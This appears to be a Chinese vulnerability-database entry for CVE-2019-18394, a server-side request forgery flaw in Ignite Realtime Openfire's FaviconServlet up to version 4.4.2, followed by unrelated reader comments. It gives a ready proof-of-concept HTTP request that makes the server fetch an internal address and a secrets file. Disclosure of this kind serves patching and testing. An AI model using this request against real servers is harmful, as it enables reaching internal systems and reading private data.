CVE-2019-18394
漏洞描述:Ignite Realtime Openfire 到 4.4.2 中的 FaviconServlet.java 中的服务器端请求伪造 (SSRF) 漏洞允许攻击者发送任意 HTTP GET 请求。
影响版本:Ignite Realtime Openfire 到 4.4.2
参考资料:https://swarm.ptsecurity.com/openfire-admin-console/
POC:
GET /getFavicon?host=192.168.176.1:8080/secrets.txt? HTTP/1.1
Host: assesmenthost.com:9090
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 2个月前0
好的,谢谢昶之琴 2个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 2个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下